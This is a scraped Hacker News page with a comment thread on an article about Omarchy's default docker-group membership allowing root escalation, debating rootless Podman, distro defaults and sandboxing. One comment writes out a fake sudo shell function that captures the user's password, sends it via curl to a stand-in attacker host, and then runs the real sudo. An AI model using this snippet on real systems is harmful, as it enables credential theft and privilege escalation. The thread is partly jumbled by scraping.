frontpage.
newsnewestaskshowjobs

Open Source @Github

fp.

Show HN: Text Logo – create text logos and wordmarks in the browser

https://textlogo.app
1•paidx•47s ago•0 comments

Rotating Boxes

https://openprocessing.org/@3ur3k4/2847445
1•bookofjoe•1m ago•0 comments

Markets do not punish firms for maintaining DEI [pdf]

https://democracypolicylab.berkeley.edu/wp-content/uploads/2026/08/folsz_grumbach_dei.pdf
1•anigbrowl•1m ago•0 comments

Good Luck, Have Fun, Don't Die: Sam Rockwell Lifts an Absurdist AI Sci-Fi Satire

https://apnews.com/article/good-luck-have-fun-dont-die-review-8c9e0815b189a2395bedf58c704cc239
1•walterbell•4m ago•0 comments

Being kicked out of the tech industry

https://www.jacky.wtf/essays/2026/kicked-out/
2•signa11•5m ago•0 comments

Google's Obedience to Trump's "Lake America" Order Follows a Depressing Pattern

https://www.motherjones.com/politics/2026/08/google-lake-ontario-america-maps-rename-capitulation/
3•cdrnsf•9m ago•0 comments

'You'll Never Catch Him '

https://www.nybooks.com/online/2026/08/30/youll-never-catch-him-coyote-vs-acme-road-runner/
1•johntfella•10m ago•0 comments

Build a Reasoning Model Scratch 1: Motivation and Code Setup [video]

https://www.youtube.com/watch?v=Kh9mqTzjuEQ
1•pretext•11m ago•0 comments

The State of Django 2026: Boring is so back

https://blog.jetbrains.com/pycharm/2026/08/the-state-of-django-2026-boring-is-so-back/
1•ferryth•13m ago•0 comments

Article will now be used to start Phase2 of "shut down open source"

https://twitter.com/chamath/status/2094098122637214107
2•bilsbie•14m ago•0 comments

Pure-Rust Headless Browser: 5× Faster, 80% Less Memory Compared to Chromium

https://www.reddit.com/r/browsers/comments/1w2mzsu/i_built_a_headless_browser_for_ai_agents_entir...
2•syumei•15m ago•0 comments

Cheap GPS Jammers Are Filling the World with Navigation Dead Zones

https://www.wsj.com/tech/gps-jammers-dead-zones-e76f3261
4•vinnyglennon•15m ago•0 comments

Semantic invariance testing for AI (Contradish)

https://contradish.com/
1•michelejoseph•16m ago•0 comments

Six Agent Harness Capabilities for Higher Model Performance

https://developer.nvidia.com/blog/six-agent-harness-capabilities-for-higher-model-performance/
2•wslh•16m ago•0 comments

Show HN: Simurg open-source web search for AI agents that aborts hallucinations

https://github.com/doofzoff/SIMURG
1•lebagetdefrance•16m ago•0 comments

Enterprise MCP Gateway: In-Flight PII Redaction and Audit in Go

https://github.com/BenjaminJ/enterprise-mcp-gateway
1•BenjaminJ•18m ago•0 comments

Meta's push to put robots to work in data centers

https://www.wired.com/story/inside-metas-experiments-with-data-center-robots/
1•joozio•19m ago•0 comments

Creation, validation, obsolescence: AI-driven labor market displacement

https://www.frontiersin.org/journals/human-dynamics/articles/10.3389/fhumd.2026.1815037/full
1•chessucation•20m ago•0 comments

Every Wikipedia Page from HN's Top Front Page

https://adamjgrant.github.io/hackernews-wikipedia/
1•hidelooktropic•21m ago•0 comments

Ask HN: Does anyone else feel like Claude is judging them?

1•digitcatphd•21m ago•0 comments

Painting one of three wind-turbine blades black reduces bird fatalities by 72%

https://onlinelibrary.wiley.com/doi/full/10.1002/ece3.6592
1•ck2•23m ago•0 comments

Spatial Audio Synthesizer

https://www.youtube.com/watch?v=E5h1YP1ETZg
1•limbicsystem•27m ago•0 comments

Agentic Inequality

https://arxiv.org/abs/2510.16853
1•wslh•29m ago•0 comments

Currency Symbol for Indian Rupee (2010) [pdf]

https://web.archive.org/web/20100821132944/https://www.idc.iitb.ac.in/events/Indian_Rupee_Symbol.pdf
1•susam•30m ago•0 comments

Early Retirement Taught Me That We've All Been Sold a Lie? [video]

https://www.youtube.com/watch?v=jBZfBZPwQZE
1•adletbalzhanov•32m ago•0 comments

The LLM is not Intelligence

https://www.vivekv.info/posts/llm-is-not-intelligent
2•vivekv•35m ago•2 comments

Show HN: OpenCode2 HUD

https://github.com/ndom91/opencode-hud
2•ndom91•38m ago•0 comments

Fears of AI-induced armageddon are overdone

https://www.economist.com/by-invitation/2026/08/23/fears-of-ai-induced-armageddon-are-overdone
1•paulpauper•39m ago•0 comments

She Popularized Economics. Then She Was Erased from History. Why?

https://www.nytimes.com/2026/08/29/business/she-popularized-economics-then-she-was-erased-from-hi...
2•paulpauper•39m ago•0 comments

Interview with Oofoe about REBOL, Forth, Decker, Janet and the VFX Industry

https://alexalejandre.com/interviews/interview-with-oofoe/
1•veqq•40m ago•0 comments
Open in hackernews

Omarchy: Any User Process Can Escalate to Root

https://0xcc.io/posts/omarchy-root-creds/
130•trap0xcc•1h ago

Comments

darkwi11ow•50m ago
Why not use rootless podman? It is 2026 not 2016, Podman works much better than Docker today.
nkydr0i0•47m ago
that's what I do and what the author recommends as well
phoronixrly•45m ago
Somehow I doubt DHH and company would be OK sacrificing ""developer experience"" for security... There is still a non-trivial amount of docker-compose files and Docker incantations that don't work 1:1 with podman and podman-compose. Adjusting them would require Omarchy's users underatanding podman, and I doubt this will align with the opinionated nature of Omarchy..
ecshafer•43m ago
Come on. I am sure you don’t like DHH. But he’s always taken security seriously in Rails.
phoronixrly•38m ago
As I said, podman requires effort and thought on the user's side, as the rootless part incurs complexity. I do not think that this aligns with the omakase mantra of omarchy. I do not think that DHH does not take security seriously. I think that Omarchy is not meant to sacrifice devex for security.
isityettime•11m ago
Rootless Podman (and rootless Docker for that matter) is not difficult to set up automatically. There is a little complexity involved, namely in configuring subuid and subgid mappings, but not much.

That said, I think Arch Linux itself has a culture that values the wrong kind of simplicity (implementation simplicity) that perversely leads to a failure to adequately grapple with inherent complexity. This leads to brittle implementations, "buyer beware" norms, "you should have run the notes", "this command should never be used", etc. Omarchy inherits all of that from Arch. It also, it seems, carried its own perverse notion of "simplicity".

12985-1286•21m ago
Shopify forced him to be a vibe coder now. Omarchy is a vibe coding distribution.

In the AI world, security issues are just another marketing opportunity.

EDIT: Downvote all you want. He was anti-AI, got a board seat at Shopify and then became an AI influencer. Now additional money is rolling in to Omarchy from Lütke and Steinberger.

psjs•37m ago
Omarchy is an agent first experience, no? just ask your agent!
alienbaby•34m ago
The article specifically calls this out as a preferred option.
iririririr•25m ago
because the distro is all about convenience over security, while selling an aura of technical superiority. Which is the modus operandi that worked for the distro author in the past, when he sold VPS with a big markup, because he also gave a script that did "ssh vps -- curl somebashscript" to do basic webdev taks.

> The security tradeoff was made for them, applied to the default account, and the tradeoff was not explained to the user.

just like the vps era. it's all about convenience.

techscruggs•46m ago
This is the type of security and vulnerability testing that actually matters. In a sea of security researcher noise, thank you for contributing in a meaningful way.
Retr0id•42m ago
Lol. This misconfiguration is so common and so trivial that LLMs have been known to exploit it unprompted, to complete their task.
delduca•41m ago
Is it not better to run a VM just for Docker, like we have to do on macOS?
gruez•34m ago
That has all sorts of issues like eating disk space and RAM, because neither can't be released to the host once allocated, but then become unused.
delduca•32m ago
At least is secure(tm)
K0IN•26m ago
I just want to put this out there, smolmachines is a wonderful program to solve this, I use this mostly for stuff needing docker socket / docker in docker (example strix and agents). (I'm using podman on my host)
Anonyneko•22m ago
At that point why not just simplify things and go back to Vagrant...?
dimitarbogdanov•21m ago
Damn, I did not know you need a VM for Docker on macOS. That's kind of ironic, isn't it XD

Every day I wake up and thank the universe for MS making WSL2

skydhash•
antiloper•39m ago
Installing docker by default is completely insane. What are they doing? Rootless podman has been around for many years at this point.
qweqwe14•39m ago
OK... and? This doesn't matter for a desktop, because:

1. Having access to the user's home directory is way more serious than being able to install drivers or whatever

2. There are a million other ways to escalate to root by obtaining the user's password

I also don't understand the point of these distros, just install Arch with KDE via archinstall, it literally takes 15 minutes. Why is it that people feel the need to use someone's Arch setup?

gruez•37m ago
https://xkcd.com/1200/
lobofta•20m ago
Because it looks cool and DHH makes a lot noises that sounds like you should listen to him.
inigyou•16m ago
And he politically aligns with a lot of people.
exitb•37m ago
It’s not great, but I’m not sure this should be framed as Omarchy-specific, when it’s a very common setup to add regular user to the docker group.
gruez•35m ago
>when it’s a very common setup to add regular user to the docker group.

As an official configuration? Or in random copy paste guides? The former is very different than the latter. It's not uncommon to disable sudo passwords, but it would be considered a serious security lapse if that were the default on some OS.

bardsore•28m ago
Adding your user to the docker group is in the official Docker install instructions, I wouldn't call that "random copy paste guides".
gruez•14m ago
You mean the optional post install instructions, which is a separate page from the main install instructions, and contains a giant warning about the security implications?

https://docs.docker.com/engine/install/linux-postinstall

If the official sudo project had a guide on how to disable passwords, that shouldn't be taken as endorsement of having that as a default config.

dpkirchner•28m ago
The methods are described on the official docker website, not just random blogs or SO pages. There are caveats about security, of course, but it's not truly discouraged.
pibaker•35m ago
I was expecting a more sophisticated attack and then I scrolled down…

> Omarchy configured its default user as a member of the Linux docker group.

What the fuck? Docker makes it VERY, VERY clear this is unsafe. Feel free to verify the documentation.

https://docs.docker.com/engine/install/linux-postinstall/

Why would you want to make this the default for your users, without even telling them? Did someone configured his own system to work this way and decided it is a good idea to ship it as a part of an "opinionated" distro??? Makes you wonder how much other crap is there.

qweqwe14•31m ago
Because it's convenient, and the security of this doesn't matter for desktop usage.
iririririr•18m ago
lol. people will vote you and not realize the irony.

just look at all the comments "this is a fair and common mistake" that are not being ironic.

k_roy•20m ago
Default configuration or not, I also imagine the first thing people using docker do is to add themselves to the docker group via sudo.

If you are security-conscious, you shouldn’t be using docker anyway.

pibaker•17m ago
If you are adding yourself to the docker group, you have presumably read the documentation and its warnings. Does an Omarchy user know the distro has made the decision on their behave?

TFA spells out why this is wrong better than I could.

> There is another important aspect of this configuration. It was opt-out, not opt-in. A user did not have to actually use Docker. The security tradeoff was made for them, applied to the default account, and the tradeoff was not explained to the user.

> Security-sensitive defaults matter precisely because many users reasonably assume that the operating system defaults to secure and will inform or prompt them to opt-in to less secure settings.

thehamkercat•33m ago
I think people shouldn't just jump to distros which are getting heavily hyped in media/Youtube, cachyOS had similar wave, and now Omarchy does.

(example: NetworkChuck, Primeagen? and a few others)

also, archlinux is much easier to install nowadays with archinstall [1], so i'm not sure you really need another opinionated layer on top of it

[1] - https://wiki.archlinux.org/title/Archinstall

bundie•22m ago
Just use Fedora. It just werks (most times).
kennywinker•11m ago
I like the very non-windows very non-mac ui of omarchy.
tomrod•5m ago
UI is desktop environment and (usually) ports to large-use distros cleanly.

- JaKooLit’s Fedora-Hyprland Repository: https://github.com/JaKooLit/Fedora-Hyprland. The most popular automated setup guide and installer for Fedora, bundling Hyprland alongside pre-configured bars, launchers, and

- Official Hyprland Wiki: wiki.hypr.land/Getting-Started/Installation/. The main reference guide for core configuration options, environment variables, and Wayland portal requirements.

- Solopasha Fedora COPR copr.fedorainfracloud.org/coprs/solopasha/hyprland. The primary community repository hosting cutting-edge builds of Hyprland and its ecosystem packages for

- Fedora Discussion Tutorials: discussion.fedoraproject.org. Community walkthroughs covering minimal netinstall setups and distro-specific Wayland troubleshooting.

mike_hearn•24m ago
Linux isn't like macOS, it doesn't have any kind of proper desktop sandboxing architecture that really works. So this is kind of security theatre. If you run a malicious program it can do stuff like tamper with your PATH or exploit local vulns in apps to get to the point where it can control anything that matters (which root generally doesn't). For instance it can just drop a custom shell into ~/.bin/.hidden-shell and reconfigure the terminal emulator to run it.

So this kind of "vulnerability" doesn't seem that important. If you run code as yourself on Linux it owns you.

On macOS it's very different. Pervasive code signing gives all apps a stable identity enforced by the kernel that they can't easily escape. The kernel can then impose sandboxing policies on any app that's run regardless of how it's installed, for instance, preventing apps from rummaging through ~/Documents or monitoring your screen. Permissions are editable and guaranteed to stick, including across upgrades. And root is disempowered so obtaining it barely matters, it's only really there for UNIX compatibility.

Unfortunately implementing an Apple style architecture on Linux would be very difficult.

bigyabai•22m ago
> it doesn't have any kind of proper desktop sandboxing architecture that really works.

Bubblewrap works.

graemep•6m ago
and Firejail
Retr0id•21m ago
> Unfortunately implementing an Apple style architecture on Linux would be very difficult.

On desktop Linux as we know it, yes, but Android manages it alright, mostly via SELinux+seccomp.

mike_hearn
PaulHoule•23m ago
I hate to be defending Omarchy but I think for the modern desktop OS like Linux or Windows or Mac OS, "root" is not what it used to be.

Like if I have something on my dev machines which is important from an enterprise perspective it is the credentials that I use to check things into the git repository or log into the postgresql database that are in some file or keyring or the credentials I used to log into some corporate IT system with my web browser. Or the Microsoft Word document with confidential plans, or the spreadsheet with personal data on 30,000 people that I don't really need to have, etc.

The "root" barrier is of limited effectiveness against those sort of attacks but the barrier between users is less important on a personal computer as opposed to the "minicomputer" world that gave birth to Unix.

In 1989 my school had a cluster of Sun Workstations running Unix for which student, faculty, and staff had accounts and it was a real threat model that you might steal the homework assignment of another student or you might take screenshots of the screen of the computer center's director that would let you watch him reading his email his email and such.

I more concerned that Apache is running under a "httpd" account or IIS is running under its own account so that I do have controls on what can be exfiltrated by that route but...

The modern developer is likely booting up a sinatra or JAXB or a httpx server on some high numbered port running as their own user so if they're going to get hit with data exfiltration or remote execution against a dev server the scope is most user files.

isatty•21m ago
What on earth is an Omarchy
12985-1286•19m ago
Officially omakase (clueless chef decides your menu with security issues) and arch linux.

The fact that it is almost an anagram of monarchy is probably a plus for DHH.

concinds•19m ago
A few days ago someone found they were flowing USB descriptors straight into the shell.

https://github.com/omacom/omarchy/commit/9285b19d6a72eba3df8...

Don't use vibecoded distros. It doesn't matter whether they fix this or that, or whether you care about a particular vuln. This is not sensible. It's why you switched away from Windows in the first place, remember?

jp_sc•6m ago
It's definitely not why *I* switched away from Windows
silisili•6m ago
Other than hype, what's the appeal here?

I saw a couple video demos recently, and was horrified that it seemed one had to memorize a dozen key binding shortcuts to really use it. Is that rather common now? I'm just a Gnome pleb who prefers discoverability via UI.

onesandofgrain•3m ago
This seems to be quite contrarian considering we had this on the front page of HN the other day: "Debian votes to allow "responsible use of generative AI".

I guess this LLM coding wasn't "Responsible" enough. hahaha

Let the AI bubble pop baby

wildster•15m ago
Debian 13 is good.
ruby_curmudgeon•13m ago
Somebody should do an audit of Omarchy Plugins: https://plugins.omarchy.org/

They run completely unsandboxed and are unvetted.

archole•8m ago
As expected from a vibecoded "distro"
arjie•8m ago
Surprised by this. I only ever use podman these days and haven’t felt the need for docker. Feels like reading about a CVE in Compiz.
lrvick•7m ago
To be fair it is easy for malware to escalate to root on any major linux distro because sudo is completely security theater.

Just overwrite sudo with this evil sudo:

function sudo () {

    realsudo=$(which sudo)

    read -r -s -p "[sudo] password for $USER: " password

    echo "$USER: $password" | \

        curl -F 'p=<-' https://attacker.com >/dev/null 2>&1


    $realsudo -S <<< "$password" -u root bash -C "exit" >/dev/null 2>&1

    $realsudo "${@:1}"

}
tomrod•7m ago
What? Why is sudo security theater?
lrvick•5m ago
Because it is trivial for unprivileged malware to phish the password and escalate to root. No production system should ever ship with sudo.
novafunc•2m ago
Any user process can append anything they want to your shell rc (.bashrc, .zshrc). In this case, they added a bash function for a fake sudo prompt. It then uses the password the user entered to run a malicious payload as root.
ahelwer•2m ago
You need root in order to overwrite sudo in the first place, but yes password replay attacks are real. This is why I think it is a good idea to get a yubikey and use PAM to require a physical user presence check to acquire root privileges. You don't even need a password at that point. Unfortunately haven't figured out how to make this work over SSH.
16m ago
Isn’t WSL2 vm based?
maleldil•13m ago
WSL2 is also a virtual machine.
anglesideangle•12m ago
WSL2 is also a VM. docker relies on the linux kernel apis, so it must be ran inside a linux VM on macos or windows
isityettime•7m ago
Windows does have a native sandboxing API that Docker is capable of using IIRC, but nobody uses it.

The macOS situation is even worse in that the kernel lacks the requisite capabilities.

WD-42•9m ago
I’d rather run real Linux in a VM than a buggy appropriation of it in WSL
skydhash•18m ago
I think there are notes that warn you about the consequences. And they have been written with sys admin in mind which knows about user groups and security.
ezst•26m ago
You mean, just how it is on Windows?
pibaker•33m ago
It is one thing to do things the risky way on your own system and another thing to ship an unsafe and unconventional default to your users.
pixl97•9m ago
This also seems like one of the more common things LLMs use to priv escalate themselves when not given root access, seems like a rather common misconfiguration.
steve1977•4m ago
Using Docker instead of podman is the first mistake and that is a distro decision (or a "chef" decision, in Omarchy parlance...)
k_roy•6m ago
I am not disagreeing at all. Nor am I trying to claim this behavior is safe.

I’m just pointing out the level-set that I’m sure the first time someone installs docker and tries to use it, chances are they are just going to install themselves in the docker group without considering the impact and continue on their day.

inigyou•17m ago
I have passwordless sudo anyway. XKCD knows why the password is pointless.
esskay•15m ago
> Why would you want to make this the default for your users

Because DHH doesn't have a clue what he's doing and is farming his brain out to Claude. Again.

quadrifoliate•21m ago
"Archlinux is much easier to install nowadays" is not really the point.

Arch is a more general purpose distro. As a developer who mostly wants a Mac-like Linux distro without the associated noise, if you encounter a problem with Arch and ask about it, you will probably get a lot of irrelevant opinions from all sorts of people that run Arch on everything from embedded devices to large servers. In a different way you can see this in this thread where instead of discussing why Omarchy has the bug (guess what, "default user and all processes launched in that user session have access to root." is a convenience that a lot of developers would like to have), people are recommending their favorite distro instead.

Even though I don't like DHH much, what Omarchy is offering is a user experience that is built with a specific sort of developer in mind; the kind that used to use Linux, moved to Macs for the convenience, and would like that convenience replicated on a Linux distro. That's why people use Omarchy specifically rather than Arch, not the YouTube stuff. I think CachyOS was the equivalent for gamers.

bigyabai•11m ago
> In a different way you can see this in this thread where instead of discussing why Omarchy has the bug

There's nothing interesting to discuss. Rootless OCI-compliant containers exist, and Omarchy ignored them. The "convenience" of the solution they chose simultaneously opens an enormous attack surface that the maintainers didn't consider.

This is why I don't believe the "give me a macOS distro" people - even Apple wouldn't do this. If you want a preconfigured Mac-like distro, then you should use GNOME and not a pre-riced desktop with hundreds of dotfiles. You don't have to use Arch either, you can go with a graphical install of Fedora or CachyOS if you want. This will give you a system that you can understand, maintained by people with a minimum standard of quality, that actually resembles the workflow of macOS. There is no Niri or Sway rice that will magically make your system make sense, and this is why I think a lot of the Mac and Windows expats should just use a normal desktop.

fny•10m ago
Why doesn't Ubuntu fit the bill? You can even install hombrew on it. Everything works like a mac with no fuss.

Also the only reason I left Linux was due to hardware. Ubuntu was convenient enough.

troupo•6m ago
> if you encounter a problem with Arch and ask about it

It's probably already documented on Arch wiki (that has been mu experience).

sva_•20m ago
I think this is more about the UI, rather than the install. I haven't tried it myself though.

I think nowadays using quickshell anyone who is so inclined can vibecode their own UI though. I recently made the switch to Wayland/hyprland and rebuilt my polybar on quickshell, even adding widgets that allow getting system info/fine grained system control (interactive Bluetooth, WiFi, Volume, Brightness etc).

kennywinker•14m ago
Ah yes, the solution to software with massive security holes is for everyone to vibe code their own software with massive security holes.

But in all seriousness, I am running omarchy now, and I will almost definitely be switching to arch at some point in the future.

sva_•7m ago
Even if you introduce bugs in your UI (which I think is not very likely if you have a basic understanding of your system), the chance that someone would exploit software that literally only runs on your own machine seems extremely unlikely to me.

I've been using arch for over 10 years btw.

esskay•16m ago
Add that annoying theo guy to that list. Cant stand these people, they confidently push out videos like they're experts, a week later it turns out whatever they were talking about was total crap and they've already abandoned it - case in point OpenClaw. Look at the mess of videos those named above put out about it, not a single one uses it anymore.
pibaker•12m ago
There is only so much a human can master in his lifetime. And if you choose to master the art of video production, then you are probably not spending that much time on mastering the thing you yap about on camera…
rramon•14m ago
Omarchy imo is best for agent maxxing Mac power users who aren't locked into Apples proprietary apps like Final Cut, audio production software or Adobe and Affinity, so maybe not so great for designers and photographers as the main system.
izacus•8m ago
Omarchy seems to be pentested by a bunch of angry haters. Who's pentesting your arch install? :P
tomrod•6m ago
Basic docker users are the same as angry haters I guess.
•
4m ago
Android is basically a different OS that happens to reuse parts of the Linux kernel.
amluto•19m ago
> Linux isn't like macOS, it doesn't have any kind of proper desktop sandboxing architecture that really works.

I’m sorry, what? MacOS’s desktop sandboxing is pathetic. Sure, it kind of sort of tries to prevent an application from rummaging until you give it permission. And that permission is hilariously coarse grained, and it gets regularly broken anyway. (Seriously, read about TCC breaks. They’re not little implementation errors — they’re giant gaping holes in the whole concept.) The entitlement mechanism basically serves to help Apple restrict what developers can do without meaningful protecting Apple’s users.

If you think that it protects you when your Mac prompts to ask whether Terminal.app may access Documents, you are welcome to enjoy your warm fuzzy feelings.

> Unfortunately implementing an Apple style architecture on Linux would be very difficult.

Why would it be difficult? I think that mostly it would reveal to whomever implemented it how useless it is.

If you mean sandbox-exec, you can do this on Linux, too. And the Linux mechanisms are not considered deprecated and undocumented, whereas Apple steadfastly refuses admit that sandbox-exec is a real mechanism.